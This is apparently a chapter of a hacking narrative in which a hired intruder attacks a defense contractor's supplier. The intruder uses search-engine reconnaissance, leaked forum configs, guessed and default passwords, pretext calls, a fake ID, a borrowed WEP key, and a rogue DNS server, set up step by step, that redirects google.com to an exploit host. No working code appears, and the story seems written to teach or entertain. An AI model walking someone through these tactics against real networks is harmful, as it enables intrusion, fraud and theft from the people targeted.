With the rough draft of the plan in place, Phoenix’s strategy begins to take shape. Phoenix wastes no time starting his recon. He starts Firefox and goes to google.com. Phoenix thinks carefully of what his first query will be. “I wonder who has links on their Web site to Grethrip’s Web site?” With that thought, Phoenix instinctively enters the following in the search area on the Google Web site:

Phoenix is surprised to see Google come back with only 50 results. But then it dawns on him: With Grethrip being probably the largest Department of Defense contractor in the world, it probably keeps a close watch on who links to its Web site and for what reason. Now partially satisfied with the results, Phoenix adds the results page to his favorites for later exploration and begins to go painstakingly through several more queries. Next Phoenix wants to see whether he might get any insight into the SONIC project that’s supposed to be top secret. His next Google query is as follows:

Phoenix huffs to himself as the results come back “Ha! 863 results. Top secret, my toe!” Again he methodically adds the results page to his favorites. “Let’s see whether we can cut through these results and get more precise hits back.” Phoenix modifies his query only slightly. He enters the following as his search query:

Although the modification is only slight, the results are deadly accurate. Phoenix’s search now is cut to 75 results and they’re all Word documents. By specifying the filetype:doc operator at the end of the query, he told Google he wanted to see only results that were Word documents. Phoenix tries a few other queries and gets mediocre results. He adds the results pages to his favorites as he did the others and moves on. “Allright, let’s see what we got,” Phoenix says to himself as he goes back to the first set of results and starts to comb through them.

As Phoenix goes through the results, he notices a few news articles about Grethrip. He finds more articles talking about contract awards and other seemingly useless stuff. Then he seems to hit something useful; The 55th result in his Google query is a company named Visual IQ that’s claiming to provide customized data visualization. And it has Grethrip listed as a client. “Now we’re getting somewhere,” Phoenix says. Instinctively, Phoenix now starts to focus some of his attention on Visual IQ. Phoenix knows that it probably won’t be nearly as protected as Grethrip. Now directing his sword, which is Google, toward Visual IQ, he begins. Phoenix decides to use the anchor operator. Figure 5.1 shows the query Phoenix chose for Google. He proceeds by entering the following in Google:

Figure 5.1 Google query using the inanchor operator

Phoenix has to blink twice as he sees Google come back with more than 250 results. Phoenix spends the better part of the next 30 minutes examining the results. He sees the usual articles, case studies, and so forth. But Phoenix finds one particular link very interesting. One of the links leads to an online help forum. It’s basically a place where people go to get technical help when they’re in over their heads. Phoenix finds that the IT Director of Visual IQ has been asking for help concerning configuring a Cisco router. As he continues to go through the results he finds more questions posted by this individual. Several questions have detailed network configuration information posted. Phoenix notices several posts in the forum where the person has asked for help configuring Cisco ASA firewalls. It appears that after asking for help, someone in the forum instructed him to execute a show run command and post the results. As expected, the individual followed the instructions. Phoenix has now identified the person as someone probably named Bill. Even though he used an unrelated screen name (Pokerman45), he ended his last post where he told the forum moderators thanks by using what appears to be his real name. “Thank you guys again for all your help. Bill” Phoenix knows that having the first name could help out later in any social engineering effort he might embark on.

“I wonder whether they have any job ads out there,” Phoenix asks himself. Phoenix enters www.monster.com into his browser and quickly does a search for Visual IQ. Monster comes back with no results. Not giving up too quickly, Phoenix tries another one. He goes to www.careerbuilder.com. Again he inputs Visual IQ in the search area. This time he has more luck. Twenty results come back. Phoenix immediately revises his query by adding the keyword IT to his search. Now the results are down to seven. The first result that comes back is an ad looking for an assistant IT director. The requirements are poorly put together, but Phoenix is able to get the gist of it, which is basically someone who knows a lot of Cisco and Windows Active Directory stuff. The other IT job ads aren’t really IT at all—instead they are ads looking for programmers. As Phoenix starts to put the pieces together, he begins to form a theory. “Okay, so it looks like Mr. IT Director Bill probably lied in his job interview and on his resume, took on a bunch of projects, and is now desperately looking for someone who knows everything about everything to cover his behind.”

To further verify this, Phoenix goes back to Netcraft.com and enters the Visual IQ domain. As Phoenix suspected, the person registered as the technical contact is a person named William Hynes. “There’s our Bill,” Phoenix says as he laughs lightly. Trying to more accurately get an idea of Visual IQ’s IT security capabilities, Phoenix now goes back to the online help forum and does a search using some of the IP addresses he recorded from the show run post that he saw earlier from Bill’s post. Almost instantly he gets about 60 results in the forum. As Phoenix goes through the results, he notices that the posts appear to be from different people who work inside Visual IQ. Suddenly it becomes vividly clear to Phoenix what’s going on. Visual IQ, for all intents and purposes, doesn’t really have an IT staff. What it has is a bunch of programmers (because they write software), who kind of share in IT work, and this Bill Hynes guy is someone they hired to take the load off. With Bill obviously not really being up to the task technically, he’s been on a mission to hire someone who can actually do the job for him. With this knowledge, Phoenix is gaining more confidence in his theory that Visual IQ probably doesn’t really even have security.

Phoenix decides to get a little more invasive to see what else he can uncover about Visual IQ. Glancing back at the Netcraft results from earlier, Phoenix notices that Visual IQ probably hosts some of its own DNS servers as well. With that thought in mind, Phoenix has another quick brainstorm. “I wonder if it hosts any FTP servers?” Phoenix enters ftp.visualiqiq.com into his browser and is immediately prompted with a username and password prompt. Phoenix quickly glances back at the Bill Hynes posts he saved from earlier. He first tries the handle pokerman as the username and the same for a password. He’s greeted with an invalid username or password message box. Without hesitating, and as the urgency starts to sink in, Phoenix begins to go through his list of most commonly used usernames and passwords. He first tries the administrator/password combination. No luck. Next he enters test for the username and test for the password. Phoenix starts cackling as he is greeted with a large directory listing. Lo and behold, there’s one directory named Grethrip.

Phoenix pauses for a few seconds and tries to imagine what’s in these directories. Any other time Phoenix would be much more careful and probably wouldn’t dream of brute-force guessing a username and password, and certainly wouldn’t open folders on a compromised server in this fashion. But Phoenix knows he’s short on time. He opens the directory named Grethrip and sees that it contains only one file. It’s an executable with a long name. Phoenix studies the file for a moment. 100808full.exe. Phoenix grew up with a father who’d retired from the Air Force before he was born. His father was a crypto specialist in the Air Force and subjected Phoenix to enough math and crypto to make a normal child insane. But at this very moment it pays off some for Phoenix. Without missing a beat, Phoenix quickly makes the connection to the filename. “Today is October 18, 2008, so that file was probably created on October 8, 2008; that is, 10-08-08.” Phoenix is pretty sure he’s right.

But what is the file and what is it for? Phoenix downloads a copy of the file. He opens the binary in IDA Pro. Phoenix has sworn by IDA Pro since his days in college, and his dependence on it has only grown since he’s been in the world of illegal hacking. Watching the executable 100808full.exe run in IDA Pro several times and pausing it occasionally, Phoenix realizes the executable simply extracts some compressed files included in the package and puts them in a certain directory. After that it installs another small program, which appears to be named Quizzi. It’s looking for a directory named C:Program FilesVIQData. Phoenix studies the path for a brief moment and then jumps back to his browser and opens a new browsing tab. He goes to Google and quickly throws together the following query.

The first result in the Google query is exactly what Phoenix is looking for. It’s a link to a downloadable executable named VIQv5.exe housed on Visual IQ’s Web page. Phoenix quickly clicks the link and begins to download the file. He runs the executable and accepts all the defaults, one of which catches his attention: “Please select a directory to install Visual IQ.” Phoenix knows he’s got the right stuff when he sees the default path to be created is C:Program FilesVIQ. Phoenix clicks Next and lets the program installation finish. Phoenix now opens Windows Explorer and browses to the Program Files directory on his C: drive to see whether he can figure out exactly what the program has installed. He notices a new folder named VIQ inside the Program Files directory. Phoenix drills down one more level, opening the VIQ directory. He’s delighted to see that the folder named Data is sitting right there. “Cool!” Phoenix shouts.

With the Visual IQ program installed, Phoenix clicks Start on his desktop and notices a new program named VIQ. He clicks on the icon and is greeted with a Welcome message. “Thank you for choosing Visual IQ. Please enter your license key or click Continue to proceed in demo mode.” He clicks Continue and is greeted with a drag and drop Windows Explorer–type user interface. Phoenix looks up at the menu bar and clicks the File drop-down. There are several options under File, including Open, Save, and a few others. The two that catch Phoenix’s attention are Load New Data and Visualize Data. Phoenix selects the visual data option and is promptly greeted with a message box that reads No data loaded to display. “Now I got it,” Phoenix says. “These guys create these customized visualization templates that run on their software.”

Apparently Grethrip has purchased the software and uses it for data visualization purposes. Based on the titles of some of the fields in the templates, Grethrip appears to be visualizing some kind of chemical reaction or biological reaction measurement and analysis process. It appears that Visual IQ is constantly updating the templates for Grethrip, and it probably makes the updates available to Grethrip via FTP. If Grethrip is as paranoid as it appears to be, it certainly wouldn’t allow Visual IQ to actually push any updates to Grethrip. “Now it’s starting to come together,” Phoenix says as he thinks out loud. With that familiar rush of progress coming over Phoenix, he realizes that he just might have found his way inside. If he could somehow get access to the next Visual IQ update before Grethrip pulls it from the Visual IQ FTP server, he might be able to get something inside Grethrip that would lead to some kind of access. Phoenix realizes he needs to do a lot more recon on Visual IQ if he is to pull this off successfully. Without wasting any more time, Phoenix starts to assemble his favorite recon tools. First Phoenix wants to double-check the e-mail address that Bill Hynes provided at his domain registrar. Phoenix reviews the results of his Netcraft findings and sees the address is [email protected]. So, he opens up one of his favorite tools: 1st Email Spider. Phoenix inputs the appropriate strings as shown here. Figure 5.2 shows the population of the 1st Email Spider user interface.

Figure 5.2 Phoenix’s population of the 1st Email Spider user interface

The results come back quickly and show that Bill Hynes has the e-mail address plastered all over the place. So, it must be good. “Let’s see whether I can find any interesting files on that Web server,” Phoenix says as he opens My IP Suite. He clicks the Web site scanner button on the left and inputs www.visualiqiq.com in the Scanner field. Figure 5.3 shows the population of My IP Suite.

Figure 5.3 My IP Suite being populated to scan the Visual IQ domain

Phoenix is pretty happy when it comes back with more than 700 files stored on the Web server. One area looks particularly interesting. Phoenix sees a large list of sequentially numbered PDF files. See Figure 5.4 for the results.

Figure 5.4 Part of Phoenix’s scanner results

Phoenix wonders whether these PDF files are protected or if they’re just out there world-readable. Phoenix goes to his browser and opens a new tab. He inputs the URL of the first PDF he sees hosted on Visual IQ’s domain:

The PDF opens right up. Phoenix can’t believe his eyes! It’s instructions on how to download updates from the FTP site. This particular PDF is for another client—some college. The PDF includes the URL, username, and password information. “Sweet,” Phoenix yells. “Now all I have to do is find the PDF that’s related to Grethrip.” But Phoenix realizes that could take a long time considering there are about 300 PDFs there. He suddenly has an idea: “I’ll just take them all, merge them into one PDF, and do a search for Grethrip inside Adobe.”

Phoenix quickly downloads all the PDFs and opens the first one in Adobe. He then clicks on the Pages tab on the left and sees all the pages in the first PDF listed. Next he browses his C drive to the directory where he’s saved all the downloaded PDFs. He holds down the Shift key on his keyboard, selects the first PDF and the last one, thereby selecting the first and last one plus all the ones in between. Phoenix now drags his cursor over his Adobe instance, and it pops back up as the active window. He then drops all the selected PDFs after the last page being displayed in the Pages view in Adobe. Adobe flashes a percentage indicator and within 5 seconds, it’s finished. Phoenix examines the page list now and sees that the PDF has more than 350 pages. Next Phoenix clicks the search icon in Adobe and enters the name Grethrip. Almost instantaneously he has a hit. Page 279 is where Adobe takes him. And right there in plain black-and-white is the username and password required to access the Grethrip folder on the Visual IQ FTP site. Phoenix knows he could pull this off using only the test account, but for auditing and other things, he knows it would make it more difficult to track down an intrusion if he used an account that’s regularly used to access the FTP site. “Okay, relax, Phoenix. Don’t get ahead of yourself,” Phoenix says to himself. “There’s still more recon that needs to be done.”

Phoenix is now ready to get more comprehensive in his recon efforts against Visual IQ and opens another of his favorite tools. He grabs a little-known tool named SpiderFoot. SpiderFoot grabs information about target domains, subdomains, and hosts of other information. SpiderFoot uses a combination of DNS, Netcraft, Whois, and several other information repositories to compile and present its information. Phoenix hasn’t used SpiderFoot in a while, so he decides to give it a refresher drive against a site he knows. He opens the SpiderFoot program and enters a test URL. Phoenix checks all the tabs to the right and clicks Start. The results are plentiful and does the job of jolting Phoenix’s memory. Phoenix calmly watches as SpiderFoot combs through the Web for information about the test target domain he’s entered. See Figure 5.5 to view SpiderFoot working.

Figure 5.5 SpiderFoot digging for domain information

Phoenix promptly replaces his test domain name with that of Visual IQ and continues to go through his recon tool chest. Phoenix looks through his tools and realizes he’s going to run out of time. He takes a leap forward and decides to go active. Phoenix goes back to Visual IQ’s Web site and locates the Contact Us page. He finds the general contact number and dials it on his cell phone. A chirpy voice answers: “Thank you for calling Visual IQ, how may I direct your call?” Phoenix clears his throat and replies, “I would like to speak with Bill Hynes, please.” The receptionist replies, “One moment please.” Phoenix hangs up the phone. Now he knows there really is a Bill Hynes there, and he knows that his phone calls are not screened.

Phoenix comes up with a plan and a strategy on how to get information out of Bill when he calls back a second time. Phoenix remembers seeing a link titled Executive Bios on the left side of Visual IQ’s Web site. Revisiting that page Phoenix sees that there are five executives listed. He quickly jots down the names and grabs his cell phone again. He hits the Redial button and calls Visual IQ general phone number again. Greeted by the same chirpy voice he again asks to speak to Bill Hynes. The receptionist replies and within moments, a weathered scratchy voice on the other end pops out of Phoenix’s cell phone. “This is Bill Hynes speaking.” Phoenix clears his throat and replies. “Hi, this is Felix Jones. I work for a Web research company. I was in a dinner with Jack English of your company about data visualization solutions, and he thought your company’s product might provide what we need. I’ve already spoken to your sales team, and they gave me all the pricing information I need and a very good overview of the product. I had some technical questions and they referred me to you to answer those. Any chance you have time to help?” Bill knows that he gets a bonus commission any time he gives someone technical guidance, and they end up buying Visual IQ. “Sure, what kinds of questions do you have?” Phoenix starts his assault. “Well, I wasn’t sure about just how much you guys can customize the product, and I wasn’t clear on exactly how fast and efficient the update process is. Let’s say I wanted a change implemented in our data package. How would I go about requesting that? How would I get the updates? And, most importantly, how fast?” Phoenix stops and catches his breath as he waits for Bill to respond.

Bill shoots back. “Basically the update process is pretty painless, and you’ll have a lot of control over how fast you get the updates. We usually turn around update requests in about 72 hours. As far as how you get them, when you purchase the product we create a share for you on our FTP site and give you access to it. As we update your solution, we post a self-extracting executable that includes your updates on the FTP share to which only you and I have access. You simply download it, run the executable, and your product is updated.” As Bill pauses, Phoenix chimes in. “Okay, that sounds painless enough. Is there any chance of getting the versions mixed up and accidentally installing an older version?” Bill jumps at the opportunity to answer this question. “Actually, that won’t happen. We do projects for a large DoD contractor, and part of the requirements it mandated was that all our executables have something called an MD5 checksum associated with it. After we create the file, we run this mathematical process against it. The MD5 process generates a mathematical fingerprint of the data that can be derived again only by running the same mathematical process against the exact same piece of data. We don’t put this number out on the FTP or make it available. We e-mail it to the client, and they run the comparison on their end once they have the executable. It’s called a hash. It’s great for making sure the executable hasn’t been corrupted, but for the DoD guys, they wanted to make sure the file wasn’t modified or replaced with a virus version in transit.”

Phoenix is almost demoralized. His plan was to do a simple Trojan wrap inside the executable used for the updates. The plan was quite simple: Wait for Visual IQ to post an update for Grethrip, pull down a copy of the update, wrap a Trojan inside it before Grethrip downloads it, and then sit back and wait for someone inside Grethrip to download the executable and run it, which would thereby install whatever Trojan or keylogger he merged inside it. Phoenix hadn’t really decided what to put there yet, but he was flirting with the idea of wrapping a RAT (remote access Trojan) inside the executable. The RAT would initiate a connection back out to a control server Phoenix would set up on the Web. Because the connection would be initiated from the inside, most firewall technologies would be useless. Phoenix thinks before responding again to Bill, and then closes the conversation. “That sounds like exactly what we’re looking for. I’ll get back in touch with your sales team and arrange a demo and possibly place my order,” Bill replies. “Okay, glad I could help. Please call back again if you have questions.” “Sure thing,” Phoenix mumbles back.

When Phoenix hits the end button on his cell phone, he jumps out of his seat and unloads a barrage of profanities. “What now?” Phoenix yells. His initial plan has pretty much just been shot down. “I must find another way. I need to go back and do more recon.” Phoenix has an idea. He realizes that his initial plan of piggybacking off the trust between Grethrip and Visual IQ is flawed, but he wonders what relationships Visual IQ has with other companies. So, he decides to revisit his recon and find out what other relationships might have been overlooked. Going back through his recon notes and findings, Phoenix is on the borderline of frustration. He’s been combing through his recon and firing off new Google queries for the last 4 hours when something hits him like a shot of adrenaline. Phoenix remembers seeing a name in his IDA Pro test: Quizzi. He also remembers browsing over that name somewhere else in his earlier recon. When Phoenix did the Google link:www.visualiqiq.com search string in Google, he remembers briefly seeing something about the Quizzi company in one of the hits he got back.

Phoenix goes back once more to his earlier Google recon on Visual IQ, and it’s not long before he finds the result he was looking for. In the fifteenth hit back from the link, query on Visual IQ, he finds that the Web site http://www.quizzisoftware.com has a link to Visual IQ’s Web site. Phoenix browses to the Quizzi Web site and begins to read. What Phoenix finds is that Quizzi is a partner and reseller for Krystal Reporting, a well-known data querying and presentation company. Phoenix notices that the Quizzi Web site is not well organized at all. As a matter of fact, it’s hard to decipher what the company actually does. Phoenix spends another 10 minutes on the Web site and decides it’s a waste of time to try and get an idea of how it’s connected to Visual IQ. It has Visual IQ listed as a client, but that’s about it. Phoenix knows he’s going to have to do some active recon to find out exactly what Quizzi does for Visual IQ. He knows a Quizzi executable ends up being packaged with all of Visual IQ’s own update executables. But how is it there? Why is it there? These questions need to be answered before Phoenix will really know what’s going on between these two companies. “I need to find out more about Quizzi.” Phoenix goes back to Quizzi’s Web page and examines the Contact Us page. He looks at the address and realizes it is based out of Chicago. Phoenix looks at the mailing address and it strikes him as odd. Knowing Chicago very well, Phoenix realizes the address, 4029 S. Cottage Grove Street, almost sounds residential. Based on instinct, Phoenix pulls up Google and clicks on the Maps link in the top of the Google search page. He enters the address from the Quizzi home page. Figure 5.6 shows the results of the search.

Figure 5.6 Google Maps initial query result

Phoenix sees the result and slightly remembers the area as a residential area where he once visited a friend. To verify, he clicks the Street View tab. Figure 5.7 shows the Street View function in Google.

Figure 5.7 Street View result of the address listed on the Quizzi Web site

Just as Phoenix thought, the address is residential. So this means that whoever these Quizzi guys are, they most likely work exclusively from their home. “I should probably do some physical recon in the area,” Phoenix says. He goes back to his Google Maps results and clicks on the Satellite View link. Phoenix knows that if he is to do proper recon, he’ll need to have some idea of what’s there before he arrives. He knows he needs to find out whether there are any trees or other natural landmarks that might be used to hide or mask his presence at the location if the need arises. Looking at the satellite view, Phoenix realizes there are several trees and what appears to be a sports field or something nearby and, apparently, a vacant lot across the street. Figure 5.8 shows the property from Google’s Satellite View.

Figure 5.8 Google Maps results seen from Satellite View

Phoenix goes back to Street View and does a 360° view of the area and address. He notices that the building right next door to the Quizzi address has an Apartment for Rent sign on the front of the building. Phoenix quickly grabs a pen and writes down the phone number listed on the front of the building. Phoenix calls the number and quickly sets up an appointment to view the apartment.

A day later Phoenix arrives to view the apartment 10 minutes ahead of schedule. Phoenix knows that apartment is a one bedroom and it’s going for $750 month. Doing the math, a one-year lease at $750 per month comes to $9,000. Phoenix knows it’s a lot of money to waste on recon, but considering he’s getting paid in the six-figure range for this job, it’s a drop in the bucket. Of course when Phoenix gets there, he takes a fake ID with him to match the fake name he gave when he made the appointment. When Phoenix reaches the apartment, he is greeted by a gentleman who appears to be in his fifties. “Hi, you must be Gary Eckers,” the man says to Phoenix. “Yes sir, that’s me,” Phoenix replies. “Well, let me show you around the place,” the man says. “By the way, my name is Tom. I’m the person you’ll contact if you have any problems around here. I do all maintenance and other related things.” The man smiles at Phoenix. Phoenix quickly replies, “Okay that’s good to know.”

One look at the inside of the building tells Phoenix these aren’t the kinds of landlords who do background checks, credit checks, or anything of that nature. This explains why they ask for two months’ rent for a security deposit. As the man gives Phoenix the tour of the place, Phoenix constantly has his eyes fixed on the building across the street; he knows that building probably holds the answers to all the questions he has about Quizzi. Phoenix, now anxious, asks Tom what he needs to move forward and actually move into the place. Tom informs him that as soon as Phoenix brings the money he’ll have him sign the lease, give him the keys, and call it a day. With that, Phoenix pulls out 15 crisp 100 dollar bills. Phoenix hands to money to Tom, and within minutes Phoenix has signed a lease and has keys to the place. As Phoenix heads out of Tom’s office, Tom stops him and asks if he wants to use the demo furniture in the apartment or will be bringing his own. Phoenix lets Tom know that he wants to use the furniture in the apartment for a while. Tom tells him no problem, and Phoenix is out the door of Tom’s office getting ready to head to his car.

As he comes out of Tom’s office, Phoenix notices a kid, who appears to be around 13 or 14, sitting in the lobby of the apartment complex office with a laptop. Instinctively Phoenix glances at the screen as he passes by and notices that the boy is online. “Excuse me,” interrupts Phoenix. “Is there free Wi-Fi in this building?” The boy looks at Phoenix with a cautious eye, and then as if determining Phoenix is okay to answer, he replies, “Well, not really. Somebody has one up somewhere around here, and we get good signal strength here, so I just use it when I’m here working for my uncle.” Phoenix looks and thinks for a second. “Oh, so Tom is your uncle?” Without looking up, the boy replies yes. Then with a sly grin on his face, the boy looks up at Phoenix again. This time he has a friendlier, more trusting look. He says to Phoenix in a low tone, “Listen, I’m gonna hook you up, dude. Whoever this guy is that set up this wireless access didn’t get the message that WEP is easily crackable. He configured it with WEP encryption. Once I saw the wireless network pop up, I went to work on connecting only to find WEP there. Next I just went online and got the video from hackingdefined and followed those steps to get his key. So because you seem like a cool dude, I’m going to give you the key and the SSID so that you can use it.”

With that the kid pulls out a piece of yellow sticky paper and scribbles some stuff on it. Phoenix almost chokes when the boy hands him the piece of paper. Right there in black and white, the SSID the kid gave Phoenix made him almost scream with joy. On the paper, written above the long WEP key was the SSID—quizzi. Phoenix cannot believe how good his luck is turning out to be. This kid just handed him the gift of a lifetime! Phoenix wastes no time rushing to his car to get his laptop. He opens his trunk, grabs his notebook, and heads back inside to start work on the Quizzi wireless network. He opens his laptop and waits for Windows to load. As soon as his desktop appears, Phoenix clicks on his wireless network icon and waits for Windows to find new wireless networks. Almost immediately Windows Wireless Zero Config shows a few wireless networks detected. But the one that gets Phoenix’s adrenaline pumping is the Quizzi wireless network that shows up in his list. Phoenix instinctively double-clicks on the Quizzi wireless network and is immediately prompted to enter a network key. Phoenix enters the code given to him by the young boy moments ago. Windows flashes a message saying it’s connecting and then the message disappears. Phoenix’s wireless network at the bottom right of his screen now flashes a connected message. “Got it!” Phoenix shouts. Phoenix moves quickly to start exploring the network. Almost immediately he fires up VMware and starts a VM instance of Backtrack. Figure 5.9 shows Backtrack loaded.

Figure 5.9 Phoenix’s Backtrack VM finishes loading.

Phoenix has used Backtrack since its creation. He loves the fact that some of his favorite exploitation and exploration tools are loaded by default. And he also loves the fact that he can boot to any PC from the Backtrack CD and within minutes have an entire penetration toolkit at his fingertips. Phoenix quickly fires off an Nmap scan to try and get an idea of what’s what. He first checks the IP settings that the access point has leased him via DHCP and mentally notes the gateway address. Phoenix sees it’s the typical 192.168.1.1 used for most home router setups. He pings the gateway address and gets successful replies back. “Okay, so ICMP isn’t being blocked,” Phoenix says to himself. With that knowledge Phoenix knows he doesn’t have to specify –P0, which tells Nmap not to do a ping and just scan. So, he enters a simple command:

Phoenix looks at the results and sees there appears to be only one computer up on the network. “It’s certainly a Windows box and it looks like Windows XP,” Phoenix says in his “whisper-talking-to-myself” voice.

The following are the relevant results of the first scan.

“This could actually be Windows XP or a really locked down Windows 2003 box. Let me try OS detection.” Phoenix now fires off an OS detection scan against the identified computer. The following is the result of that scan.

“Dammit!” Phoenix says. “This jerk is running Vista.” Phoenix knows that most of the exploits he regularly uses on Windows boxes that aren’t fully patched probably will not work in this case. Phoenix knows that with Microsoft implementation of the new ASLR (Address Space Layout Randomization), buffer overflows are now almost impossible. He thinks for a few minutes. Phoenix remembers reading an article about some client-side-based exploits that have been reported to successfully exploit Vista machines. But with that idea Phoenix comes to the reality that it’s going to be hard to trick the Quizzi guy into browsing to a malicious site.

Phoenix decides to run Nessus against the Vista computer to see what it might be vulnerable to. Phoenix thinks about Nessus for a moment but then decides he needs a faster way. Phoenix decides he needs to have something more powerful, something that can actually do the penetration. Core Impact! Phoenix remembers listing to a webcast where the product was being demoed. “That software can check for hundreds of vulnerabilities and exploit them all in the amount of time that it takes me to do one manually.” Phoenix whips out his prepaid cell phone and calls the contact number given to him when he started this project. The phone rings only once and a scratchy voice answers; “What do you want?” says the voice on the other end. “I need a license for Core Impact,” Phoenix says. As he’s getting ready to continue and explain to the person on the other end what Core Impact is, the man interrupts him. “Check your e-mail . You should have a license key in there. Also, there’s a download link included.” Without another word, the man hangs up. Phoenix browses to Gmail and checks his account. And sure enough, there’s an e-mail from an obviously spoofed account that has a subject that just reads KEY.

Phoenix opens the e-mail and copies the key. He follows the link in the e-mail and downloads Core Impact. After the download Phoenix quickly installs the software, accepting all the defaults. After successfully installing Core Impact, Phoenix starts up the program. He is presented with the welcome screen and some options that need to be configured. Looking at the startup control panel, Phoenix is amazed at the number of exploits Core comes loaded with. Figure 5.10 shows the welcome screen and default start page of Core Impact.

Figure 5.10 Core Impact on startup

After quickly getting over the amazement of all the exploits, Phoenix clicks on the New Workspace button and completes only the required information in the resulting dialog. Figure 5.11 shows the completed new workspace setup.

Figure 5.11 Core Impact new workspace setup

Phoenix clicks Next, and then clicks Next once more to accept the license agreement information. Next Core asks him to enter a passphrase for this workspace and instructs him to move the cursor around in a small box area. Core uses RSA to generate a key, and requires the movement of the mouse to generate the randomness of the key creation. Phoenix follows the instructions. Figure 5.12 shows the RSA key pair generation in Core Impact.

Figure 5.12 Core Impact key generation

Phoenix clicks on Finish and is presented with the Core control and module management page. He looks over the options. Phoenix glances at the first option in the list, which is the network discovery option. He quickly decides he doesn’t have time for this, nor does he need it because he already did discovery with Nmap. Phoenix goes right for the pentesting option. So he clicks on the Network and Penetration testing link and is presented with the Penetration Wizard. Phoenix clicks Next and is presented with the option to pick the Select a Host list or enter a range of IPs. Again, with time being the crucial factor, Phoenix simply enters the single IP of the Vista computer he’s discovered on the network. Figure 5.13 illustrates the target selection.

Figure 5.13 Target selection

Phoenix accepts the default on the next three screens, which ask about speed, target exploitation methodology, and whether or not to use exploits that could leave the box not running too. Phoenix ponders this decision for a moment and then selects to not use those exploits and use only safer ones. Besides, the machine being DoS’d does him no good. Phoenix clicks Finish and like magic, Core Impact goes to work looking for vulnerabilities and then immediately trying to exploit them. The software runs for about 1 minute and comes back with nothing. “Is this Vista box really that tight?” Phoenix asks himself. “I probably didn’t configure something right, and right now I don’t have time to learn this program.” I’ll have to go at this manually. Just that instant Phoenix remembers reading an article written by a prominent hacker. In the article the hacker claimed that in his neighborhood, most of the access points he found were still configured with default username and password for the router management login. “It’s a long shot, but it’s worth a try.” Phoenix then fires off an Nmap scan against the default gateway, just as he did against the Vista box.

The results are as follows:

The results come back and tell him the access point is most likely a Netgear. Phoenix goes back to his Web browser and goes to www.defaultpasswordlist.com. Figure 5.14 shows the defaultpasswordlist.com page.

Figure 5.14 The defaultpasswordlist.com Web site listing of vendor default passwords

Phoenix looks at the long list of default Netgear passwords and now has to go through the process of guessing which model is probably installed in the home of the Quizzi guy. Phoenix knows that the Netgear WGR614 is the most commonly sold router for home use. So, he gambles and gives it a try. Phoenix replaces the www.defaultpasswordlist.com URL in his browser with the IP address of the default gateway from his IP settings, which is also the IP address of the Linksys router. As expected, Phoenix is presented with an authentication page that asks for a username and password. He enters the default administrator as the username and password as the password. Phoenix is instantly excited and smiling again as the router configuration page flashes up on his screen. Phoenix clicks on the WAN settings icon and suddenly hits a mental block. “This is all great, but how is it going to get me access to the Vista machine? What the hell am I doing here?” Phoenix takes his hand off the keyboard and takes a deep breath. Phoenix realizes he needs to come up with a plan and quick. This is not one of those times where he has days to construct a cool elaborate hack that will be sure to wow his other friends in the underground. Phoenix thinks, “I have his router, I own it, it’s mine now. How can I get to that box, though?”

All kinds of ideas run through Phoenix’s head. And as he glances at the screen again, an idea comes to mind. “DNS is the key. That’s how I can perform a client-side attack. Maybe I can poison the DNS records and put a bogus A record in there that points Yahoo! or some other site the Quizzi guy might visit to an exploit-loaded version of Yahoo! I have waiting.” Phoenix looks at the screen again and then realizes that the router doesn’t actually hold any A records because it simply forwards all DNS queries out to the ISP DNS server. “Bad idea,” Phoenix says to himself as if calling himself an idiot. Then another idea hits Phoenix. “Maybe I can set up a DNS server myself, point the router to it for DNS, and configure my DNS server to forward all requests to a real DNS server on the Web. Hey, I’ll just forward to the ISP’s DNS server! Put a bogus A record on my DNS server that points http://www.google.com to a Web server I have waiting that will automatically load an exploit or Trojan.” Phoenix thinks about it and snaps his fingers. “That should actually work!” Then the excitement subsides slightly as Phoenix realizes he has to put some real work in and have everything in place and running before the Quizzi guy gets home and tries to use the Internet. Here are the steps in setting up the attack Phoenix is planning:

With his plan clearly in place, Phoenix begins to put the pieces in place he’ll need for the exploit. He starts by building the DNS server. Phoenix opens his VMware window and starts up a preinstalled Windows 2003 virtual machine he’s built just for situations like this.

Phoenix pauses for a minute and thinks to himself. “I really need to sketch this out so that I don’t lose track of what I’m trying to do.” He starts Microsoft Visio and quickly lays out the plan. Figure 5.15 shows Phoenix’s plan.

Figure 5.15 Phoenix’s sketch of his setup and environment

Phoenix realizes that he’ll have to modify only the entry in the access point that specifies the primary DNS server. He’ll have to leave any secondary servers specified as is. This will allow his own DNS server, which will be running on his VMware 2003 server instance, to actually resolve external domains. Phoenix, now satisfied with his plan, continues building the DNS server. On his 2003 virtual machine, he selects Start, All Programs, Administrative Tools, DNS. Figure 5.16 shows Phoenix accessing the DNS configuration.

Figure 5.16 Getting into the DNS configuration

After selecting DNS, an hourglass pops up on the screen and stays there for a few seconds, and then the DNS screen appears. Phoenix right-clicks on the existing forward lookup zone he’s used for testing and selects New Zone. Figure 5.17 shows Phoenix creating a new DNS zone.

Figure 5.17 Creating a new zone in Windows 2003 Server DNS snap-in

After selecting New Zone, Phoenix is prompted to click Next to continue inside the DNS Zone Creation Wizard. He selects Next and is asked to select the kind of zone he wants to create. It’s important to note that Phoenix selects Primary Zone here because he doesn’t want the DNS server to try and serve as a child or secondary server to the real google.com. In other words, he doesn’t want his fake DNS server to go out and ask Google DNS servers for a zone transfer! So, Phoenix selects Primary Zone. Figure 5.18 shows Phoenix completing the zone creation in DNS.

Figure 5.18 Selecting Primary Zone as the zone type

Next Phoenix inputs google.com as the zone name. Figure 5.19 shows the google.com zone being created.

Figure 5.19 Creating the google.com DNS zone

After this step, Phoenix accepts the defaults on the remaining questions Windows asks. Then he clicks Finish. Now the new zone shows up in his DNS configuration. Figure 5.20 shows the completion of the new google.com zone.

Figure 5.20 Completed google.com zone creation

Now all that’s left to do is to create the A record for www.google.com and set the forwarders. Phoenix has already created the zone and now just needs to add the pointer for www next. Phoenix moves his cursor to the right Windows pane. He right-clicks in the white space. From the resulting drop-down list, Phoenix selects New Host (A) Record. Phoenix then inputs the IP address his Backtrack VM leased from Quizzi’s wireless access point, and then simply types www in the name area. Figure 5.21 shows the A record creation for www.google.com.

Figure 5.21 Creating the A record for www.google.com

Phoenix now needs to configure the DNS server to forward all requests for URLs it doesn’t know about to a real DNS server. Phoenix now goes back to his notes and takes a look at the configurations he got from the WAN side (the Internet side connected to Quizzi’s ISP router). He records the primary and secondary DNS server addresses and writes them down. Now Phoenix goes back to his 2003 VM and in the DNS configuration panel, he right-clicks the DNS server itself and selects Properties. Phoenix then selects the Forwarders tab. He then enters the DNS server IP addresses he copied from the Quizzi wireless WAN side configuration. Figure 5.22 shows the configuration of DNS forwarders.

Figure 5.22 Configuring DNS forwarders

